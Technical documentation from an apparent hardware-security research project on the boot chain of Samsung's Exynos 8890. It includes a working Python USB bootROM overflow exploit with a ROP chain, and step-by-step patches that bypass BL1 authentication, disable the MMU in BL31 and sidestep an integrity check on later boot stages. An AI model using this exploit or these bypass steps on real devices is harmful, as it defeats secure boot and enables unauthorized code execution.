==================
Exploit boot chain
==================

This part describes the boot chain of the ``Exynos 8890`` SoC.

.. important::

    This is all still under development and will change.

General overview
================

Memory layout
^^^^^^^^^^^^^

Keep this overview in mind when reading through the boot chain exploit.

.. raw:: html

    <!-- memory layout diagram: embedded content not recovered -->

Approach
^^^^^^^^

In our initial approach, we booted every stage manually from the debugger and jumped straight back to the debugger afterwards (without using the USB protocol). The goal was to keep the debugger alive throughout the boot chain, but this became very difficult after BL31: the MMU no longer allowed us to read or write most memory, which at some point cut off our access to BL31 during boot and cost us the debugger interface. This is also why there is some ghost code within the project.

Boot stages
^^^^^^^^^^^

Get the correct payloads for the bootROM stages from Samsung firmware files, or from the Exynos8890 usbdl-recovery images/firmwares.

.. list-table:: bootROM stages
    :header-rows: 1

    * - File
      - Strings output
      - Likely boot stage?
    * - sboot.bin.1.bin
      - Exynos BL1
      - BL1
    * - sboot.bin.2.bin
      - BL31 %s
      - BL31
    * - sboot.bin.3.bin
      - Unsure. Contains strings like: TOP_DIV_ACLK_MFC_600 and APOLLO_DIV_APOLLO_RUN_MONITOR
      - BL2?
    * - sboot.bin.4.bin
      - Contains more textual information, references to post-BL2 boot, and Android information
      - Kernel boot/BL33?

Gupje
^^^^^

.. note::

    Gupje is the debugger we'll be loading onto the device and moving around throughout the boot chain.

Gupje needs to be built and loaded onto the device. Throughout the exploit, we moved the debugger to different locations in device memory. This was necessary because the location we initially used was in the way of memory used by BL31 or BL2.
After BL31, we lost access to the debugger, as BL2 was overwriting our last available space. At some point we moved the debugger to ``0x11200000``, as we saw that this space was used by BL31. This space is executable when the MMU is off.

Below are the most important arguments for building the debugger. First the ``linkscript.txt`` file.

.. code:: bash

    LINKSCRIPT.txt
    debugger_storage = 0x11201200;
    debugger_stack = 0x11201000;
    debugger_entry = 0x11200000;
    maybe_usb_setup_read = 0x00006f88;
    dwc3_ep0_start_trans = 0x0000791c;
    usb_event_handler = 0x00007bac;
    get_endpoint_recv_buffer = 0x00007a7c;
    exynos_sleep = 0x000027c8;
    g_recv_buffer = 0x11201600;
    g_data_received = 0x11201400;

And the ``symbols.ld`` file.

.. code:: bash

    SYMBOLS.ld
    MEMORY {
        ROM (rwx): ORIGIN = 0x11200000, LENGTH = 0x1000
    }

    SECTIONS
    {
        . = 0x11200000;
        .text . : {
            *(.text*)
            *(.data*)
            *(.rodata*)
        } >ROM
    }

Debuggers
=========

After the initial exploitation, the goal was to fully boot the device. The next phase is to (1) load a debugger and (2) continue booting the device.

If we manage to keep access to the debugger throughout the boot, this gives us room to exploit the device. However, the debugger needs to be kept 'alive' through the boot chain. The main difficulties are the location of the debugger in memory (as it gets overwritten) and the MMU being enabled after BL31.

Initial debugger
^^^^^^^^^^^^^^^^

The initial debugger is written to ``0x2069000``, with ``debugger_stack`` and ``debugger_storage`` at ``0x0206b000`` and ``0x0206d000`` respectively.

After the initial loading of the debugger, the processor state reported is (using ghidra assistant):

.. code-block:: bash

    root | DEBUG |
    X0  : 0x0        | X1  : 0xffffffff | X2  : 0x20215d8 | X3  : 0x2021894 | X4  : 0x4       | X5  : 0x0       | X6  : 0x0 |
    X7  : 0x136c0008 | X8  : 0x2069000  | X9  : 0x0       | X10 : 0x2070000 | X11 : 0x0       | X12 : 0x0       | X13 : 0x0 |
    X14 : 0xf        | X15 : 0x206d000  | X16 : 0x9       | X17 : 0x0       | X18 : 0x1       | X19 : 0x2000    | X20 : 0x2069000 |
    X21 : 0x0        | X22 : 0x0        | X23 : 0x0       | X24 : 0x0       | X25 : 0x0       | X26 : 0x0       | X27 : 0x1 |
    X28 : 0x0        | X29 : 0x2020f00  | LR/X30 : 0x20219b8 | SP/X31 : 0x2020ef0

``LR/X30`` is the link register. This is the address the processor jumps to when the current function returns (important to keep track of).

Second debugger
^^^^^^^^^^^^^^^

After a cache flush, the debugger seems to be cleared as well, so the debugger is relocated to ``0x20c0000``, with ``debugger_stack`` and ``debugger_storage`` now at ``0x20c2000`` and ``0x20c4000`` respectively.

This is done by running:

.. code-block:: python

    self.cd.arch_dbg.state.auto_sync = False
    self.cd.arch_dbg.state.auto_sync_special = False
    self.cd.arch_dbg.state.print_ctx()

    def relocate_debugger():
        # Seems to be cleared upon cache clearing??
        debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
        self.cd.memwrite_region(0x020c0000, debugger_reloc)
        self.usb_write(b"FLSH")  # Flush cache
        self.cd.restore_stack_and_jump(0x020c0000)
        assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
        self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)

    relocate_debugger()

The processor state reported then is:

.. code-block:: bash

    root | DEBUG |
    X0  : 0x0        | X1  : 0x1        | X2  : 0x20215d8 | X3  : 0x2021894 | X4  : 0x4       | X5  : 0x0       | X6  : 0x0 |
    X7  : 0x136c0008 | X8  : 0x2069000  | X9  : 0x0       | X10 : 0x2070000 | X11 : 0x0       | X12 : 0x0       | X13 : 0x0 |
    X14 : 0xf        | X15 : 0x20c4000  | X16 : 0x9       | X17 : 0x0       | X18 : 0x1       | X19 : 0x2000    | X20 : 0x2069000 |
    X21 : 0x0        | X22 : 0x0        | X23 : 0x0       | X24 : 0x0       | X25 : 0x0       | X26 : 0x0       | X27 : 0x1 |
    X28 : 0x0        | X29 : 0x2020f00  | LR/X30 : 0x20c0000 | SP/X31 : 0x2020ef0

Final debugger
^^^^^^^^^^^^^^

We searched for quite some time for a space that was both writeable and executable. After BL31, most memory became unreachable, with the MMU not allowing reads or writes at most addresses. We tried putting the debugger in the GPU cache and in some other regions visible in the dtsi files, and eventually found a space at ``0x11200000``. This space is executable when the MMU is off. With the MMU on, we can read and write but not execute there.

Python part
^^^^^^^^^^^

Python code to set up the debugger.

.. code-block:: python

    # Setup initial debugger
    self.setup_guppy_debugger()
    self.cd.arch_dbg.state.auto_sync = False
    self.cd.arch_dbg.state.auto_sync_special = False
    logger.debug('State after setting up initial debugger')
    self.cd.arch_dbg.state.print_ctx()

    DEBUGGER_ADDR = 0x2069000

    # Relocate debugger
    debugger = open("../../dump/reloc_debugger_0x11200000.bin", "rb").read()
    self.relocate_debugger(debugger=debugger, entry=0x11200000, storage=0x11201200, g_data_received=0x11201400)
    DEBUGGER_ADDR = 0x11200000

    # Test debugger connection
    self.cd.test_connection()

Stage 1 - Initial exploit
=========================

Frederic created a payload called 'Exynos8890dump_bootrom', which used the USB DWC3 (Synopsys DesignWare USB 3.0) interface to read and dump the bootROM. This payload was slightly modified to keep the USB connection alive (stage1.bin). Frederic's C code was reimplemented in Python.

.. code:: python

    def exploit(self, payload: bytes):
        '''
        Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
        '''
        assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
        current_offset = TARGET_OFFSETS[self.target][0]
        xfer_buffer_start = TARGET_OFFSETS[self.target][1]  # start of USB transfer buffer
        transferred = ctypes.c_int()
        size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6  # max_uint32 - header(8) + data(n) + footer(2)
        #size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8
        max_payload_size = 0x100000000 - size_to_overflow
        ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)

        # Pad the payload with zero bytes, then assert that it is 502 bytes
        payload = payload + ((max_payload_size - len(payload)) * b"\x00")
        assert len(payload) == max_payload_size, "Invalid payload. Size is wrong"

        # First send payload to trigger the bug
        bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE]  # dummy packet for triggering the bug
        bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
        assert res == 0, "Error triggering payload"
        assert transferred.value == len(bug_payload), "Invalid transferred size"
        current_offset += len(bug_payload) - 8  # Remove header

        # Send empty transfers until the next chunk would reach the transfer buffer
        cnt = 0
        while True:
            if current_offset + CHUNK_SIZE >= xfer_buffer_start and current_offset < xfer_buffer_start:
                break
            self.send_empty_transfer()
            current_offset += CHUNK_SIZE
            cnt += 1
            if current_offset > 0x100000000:
                current_offset = current_offset - 0x100000000  # wrap around as a 32-bit integer
            print(f"{cnt} {hex(current_offset)}")

        remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
        assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
        if remaining > BLOCK_SIZE:
            self.send_empty_transfer()
            # Send last transfer, TODO who aligns this ROM??
            current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
            cnt += 1
            print(f"{cnt} {hex(current_offset)}")

        # Build ROP chain.
        rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
        transferred = ctypes.c_int(0)
        res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
        assert res == 0, "Error sending ROP chain"
        return

After this exploitation, we are able to send custom payloads. The first payload that is sent sets up the debugger. To run the debugger, a small part of the bootROM was reversed in order to implement send/recv functionality.

@EljakimHerrewijnen: what send/recv did you reverse? What code from the bootROM did you reverse?

Stage 2 - BL1
=============

Here, in order, are the patches we applied to get BL1 to boot:

.. figure:: images/boot_chain_bl1.drawio.svg
    :align: center

    Boot chain

- Overwrite the USB return address pointer (``0x02020f60``) to jump back to the debugger:
  ``self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))``
- Set the link register to the debugger and jump into the boot USB function (``0x000064e0``):
  ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR`` and then ``self.cd.restore_stack_and_jump(0x000064e0)``
- Now we can send the BL1 binary to the device:
  ``self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())``.
  At this point, we retain access to the debugger.
- To patch the authentication, we set X0 and X1 to 1, again set the link register to the debugger, and jump into the authentication function at ``0x00012848``:
  ``self.cd.arch_dbg.state.X0 = 1`` and ``self.cd.arch_dbg.state.X1 = 1`` and ``self.cd.arch_dbg.state.LR = lr`` and then ``self.cd.restore_stack_and_jump(0x00012848)``
- We flush the cache with ``self.usb_write(b"FLSH")`` (Frederic did this as well).
- Now we hijack the USB download function to jump back to the debugger:
  ``self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR))`` and
  ``self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))``
- And finally, we again restore our link register to the debugger and jump into BL1:
  ``self.cd.restore_stack_and_jump(0x000002c0)``

.. figure:: images/initial_boot_function.png
    :align: center

    Overview of the initial boot function in the Exynos 8890.

At this point, after loading and executing BL1, the device returns to the debugger. Normally, the device would boot into BL1 and then wait for the next boot stage to be sent over USB. Because we hijacked the USB return address pointer, the device returns to the debugger instead.

Regarding ``auth_bl1``: initially we thought that ``0x0`` indicated a verified boot state (which is plausible when reading the decompiled code in Ghidra). However, after modifying both the header and the contents of BL1, this value did not change.

.. note::

    Git commit 8cb5f2e1 fully boots; you can use this commit to patch BL1 only.

Stage 3 - BL31
==============

Initial boot through BL31
^^^^^^^^^^^^^^^^^^^^^^^^^

Next up is BL31, which is loaded by BL1. BL31 is written to ``0x02024000`` with its entry point at ``0x02024010``, and it ends at ``0x02048000``.

``BL31`` is the secure monitor. The monitor uses memory that is also used by the debugger, so we have to relocate the debugger to keep code execution.

.. figure:: images/bl31_debugger_memory_example.png
    :align: center

    Example of BL31 using memory from the initial debugger.

BL31 also configures ``VBAR_EL3`` and the MMU, so the memory mapping will probably change after this stage (preparation for TrustZone?).

Here we decided to move the debugger to ``0x02048000``, as this space is still accessible after BL31. However, this space gets overwritten by BL2.

At this point we switched our approach to booting the device, as we were unable to keep the debugger alive throughout the boot chain.
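
Whether a candidate debugger location collides with the BL31 image comes down to a half-open interval overlap test. The sketch below is illustrative only: the helper ``overlaps``, the ``0x1000`` debugger size (taken from ``LENGTH`` in ``symbols.ld``) and the ``inside_bl31`` address are assumptions, and it only considers the BL31 load range given above, not memory that BL31 uses at runtime.

.. code-block:: python

    BL31_START, BL31_END = 0x02024000, 0x02048000  # load range from this section
    DEBUGGER_SIZE = 0x1000  # assumption: LENGTH from symbols.ld

    def overlaps(start_a, end_a, start_b, end_b):
        """True if half-open ranges [start_a, end_a) and [start_b, end_b) intersect."""
        return start_a < end_b and start_b < end_a

    # Debugger locations mentioned in this document, plus one hypothetical
    # address inside the BL31 image as a positive control.
    candidates = {
        "initial": 0x02069000,
        "second": 0x020C0000,
        "after_bl31": 0x02048000,
        "final": 0x11200000,
        "inside_bl31": 0x02030000,  # hypothetical, for illustration
    }

    results = {
        name: overlaps(base, base + DEBUGGER_SIZE, BL31_START, BL31_END)
        for name, base in candidates.items()
    }
    for name, hit in results.items():
        print(f"{name:>12} @ {candidates[name]:#010x}: overlaps BL31 image = {hit}")

None of the documented locations intersects the image range itself (``0x02048000`` starts exactly where BL31 ends), which is consistent with the conflicts coming from memory the monitor uses while running rather than from its load range.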
We now boot the device normally and then try to regain our debugger after booting each stage. Because of this, we did not need to modify much after BL1. Essentially all we did was:

- Set the link register to the debugger: ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR``
- Jump into our hijacked USB function: ``self.cd.restore_stack_and_jump(hijacked_fun)``
- Send BL31: ``self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())``
- Continue a function that BL1 called via the USB: ``self.cd.restore_stack_and_jump(0x2022948)``
- Jump into BL31: ``self.cd.restore_stack_and_jump(0x02024010)``

This boot process returns us to the debugger, but afterwards we are unable to access most memory regions. Notably, we tried to read ``TTBR0_EL3``, but something prevents us from reading it. We were not able to find any executable space that would still be available after BL2; BL2 would overwrite our debugger at this point.

Patching BL31
^^^^^^^^^^^^^

While looking for flags used for the MMU, we found a function at ``0x020244e8`` which we were able to turn off while still allowing a full boot into recovery. With this change, the MMU was reported as disabled.

- Get special registers: ``self.cd.arch_dbg.fetch_special_regs()``
- MMU state: ``self.cd.arch_dbg.state.R_SCTLR_EL3.mmu``

.. figure:: images/turn_off_MMU_but_good_boot_0x020244e8.png
    :align: center

    Patchable function that turns off the MMU but keeps the boot intact.

Additionally, while looking for bit flags in Ghidra, we found a space at ``0x11207010`` which seemed to be readable and writeable memory. This space was not executable unless the MMU was turned off. We used this space to store our debugger; then, before booting BL31, we patched the if-statement above to disable the MMU, and booted.
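
The ``mmu`` field read above presumably reflects the ``M`` bit (bit 0) of ``SCTLR_EL3``. As a minimal sketch that does not depend on the debugger API, a raw register value can also be decoded by hand. The helper name ``decode_sctlr`` is hypothetical; the example values are the ``SCTLR_EL3`` and ``Current EL`` values from the register dump in Stage 4.

.. code-block:: python

    # Selected SCTLR_ELx control bits as defined by the Armv8-A architecture.
    SCTLR_BITS = {
        "M": 0,    # MMU enable
        "A": 1,    # alignment check enable
        "C": 2,    # data cache enable
        "SA": 3,   # stack alignment check enable
        "I": 12,   # instruction cache enable
    }

    def decode_sctlr(value: int) -> dict:
        """Return the selected SCTLR_ELx control bits as booleans."""
        return {name: bool((value >> bit) & 1) for name, bit in SCTLR_BITS.items()}

    flags = decode_sctlr(0xC5183A)   # SCTLR_EL3 from the Stage 4 dump
    current_el = (0xC >> 2) & 0x3    # CurrentEL keeps the exception level in bits [3:2]

    print(flags)
    print(f"MMU enabled: {flags['M']}, exception level: EL{current_el}")

For ``0xc5183a`` the ``M`` bit is clear, which matches the ``MMU is 0x0`` line in that dump, and a ``Current EL`` value of ``0xc`` decodes to EL3.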

- Patch the if-statement so that its condition is not met: ``self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1))``
- Jump into BL31: ``self.cd.restore_stack_and_jump(0x02024010)``

Stage 4 - BL2
=============

This is our current progress. BL2 has booted and shows the VBARs for EL1.

.. code:: bash

    MMU is 0x0 (0x1=enabled, 0x0=disabled)
    TTBR0_EL3: 0xbc4650892f1460, TTBR1_EL2: 0xc54d39cb66f0, TTBR0_EL1: 0xa5c20fc0ac581142
    VBAR_EL3: 0x2031800, VBAR_EL2: 0x0, VBAR_EL1: 0x2053800
    TCR_EL3: 0x0, TCR_EL2: 0x80800000, TCR_EL1: 0x0
    SCTLR_EL3: 0xc5183a, SCTLR_EL2: 0x30c5083a, SCTLR_EL1: 0x30c5083a
    MAIR_EL3: 0x44e048e000098aa4, MAIR_EL2: 0x1e42bb572931240b, MAIR_EL1: 0x44e048e000098aa4
    Current EL: 0xc

Stage 5 - BL33
==============

The last stage before the kernel boots.

.. figure:: images/bl31_debugger_memory_example.png
    :align: center

    Boot chain with EL3 and EL1 areas

To keep access to the debugger while still allowing modifications, we again need to load BL33 without booting it. This requires setting some registers. We continue the boot flow so that the device loads BL33 and, once loading is done, jumps back to the debugger:

- Store the BL33 address in X0: ``self.cd.arch_dbg.state.X0 = BL33_ptr``
- Store the BL33 link register in LR: ``self.cd.arch_dbg.state.LR = BL33_LR``
- Set LR to the debugger: ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR``
- Jump into the function that loads BL33: ``self.cd.restore_stack_and_jump(hijacked_fun)``

Now we can again load our next boot stage (BL33), send it, and verify a return to the debugger.

At this point, we tried patching something in BL33's memory, as we did for BL31, but this always failed. After consultation, it seemed most likely that something was checking the integrity of the next boot stages. When we modified memory and then reverted our changes, the boot proceeded properly.

The link register to continue our boot flow was at ``0x2024eec``. We did not succeed in performing the verification manually and then continuing the boot flow.
The function at ``0x2024eec`` also does not return, but instead continues onwards.

.. figure:: images/_integrity_check_BL2-BL33.png
    :align: center

    Possible integrity check of boot stages at BL2 and BL33.

The decompilation is a bit broken, but we noticed that there are multiple calls to the same function, not just at the location where BL33 was returning from, and that most BL33-specific work is already done before this function is called.

A similar verification seemed to be done at ``0x02024e5c``. At this address, the same function is executed as at ``0x02024eec``, so instead of jumping into the function at ``0x02024eec``, we jumped into the function at ``0x02024e5c``. This worked and allowed us to patch BL33 while continuing our boot flow. I assume that we are doing an integrity check over BL2 while booting BL33.